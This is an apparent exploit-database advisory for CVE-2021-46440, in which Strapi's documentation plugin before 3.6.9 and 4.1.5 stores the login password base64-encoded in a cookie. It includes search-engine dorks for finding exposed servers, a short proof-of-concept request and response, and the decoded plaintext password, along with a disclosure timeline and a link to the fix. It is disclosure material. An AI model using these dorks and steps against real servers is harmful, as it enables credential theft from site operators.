Headline
Strapi 3.6.8 Password Disclosure / Insecure Handling
Strap versions prior to 3.6.9 and 4.1.5 disclose a user’s password due to simply base64 encoding it and sticking it in a cookie.
# Exploit Title: Strapi < 3.6.9 and < 4.1.5 DOCUMENTATION plugin - Storing Passwords in a Recoverable Format# Google Dork: intitle:"Welcome to your Strapi ap"# Shodan search: "X-Powered-By: Strapi <strapi.io>"# Date: 2022-03-30# Exploit Author: Kitchaphan Singchai [idealphase]# Vendor Homepage: https://strapi.io/# Software Link: https://github.com/strapi/strapi/releases# Vulnerable Version: < 3.6.9 and < 4.1.5# Version: 3.6.8# Tested on: Linux# CVE: CVE-2021-46440# Description:Storing passwords in a recoverable format in the DOCUMENTATION plugin component of Strapi version prior 3.6.9 and prior 4.1.5 allows an attacker to access a victim's HTTP request, get the victim's cookie, perform a base64 decode on the victim's cookie, and obtain a plaintext password, leading to getting API documentation for further API attacks.# This CVE has been fixed via this Github pull request.- Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)# PoC:[Request]POST /documentation/login HTTP/1.1Host: 127.0.0.1:1337..[SNIP]..password=password[Response]HTTP/1.1 302 FoundSet-Cookie: strapi.sid=eyJkb2N1bWVudGF0aW9uIjoicGFzc3dvcmQiLCJfZXhwaXJlIjoxNjQyNjg2NDQyNzc2LCJfbWF4QWdl Ijo4NjQwMDAwMH0=; path=/; httponlySet-Cookie: strapi.sid.sig=e-5j8FBY8RSWqjALRv2dlPT5_gw; path=/; httponlyX-Powered-By: Strapi <strapi.io>..[SNIP]..Redirecting to <a href="/documentation">/documentation</a>.Perform Base64 decoding and we got plaintext password in “documentation” json key as shown below.{"documentation":"password","_expire":1642686442776,"_maxAge":86400000}# Timeline:19/Jan/2022 - Inform vulnerability to Strapi team20/Jan/2022 - Strapi validate the issue and have found a fix that they plan to review, merge, and release ASAP.8/Feb/2022 - Pull request created on Official Github strapi - Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)28/Mar/2022 - Reserved CVE-2021-4644029/Mar/2022 - Reproduce vulnerability on v3.6.9 and v.4.1.5 [Status:Fixed]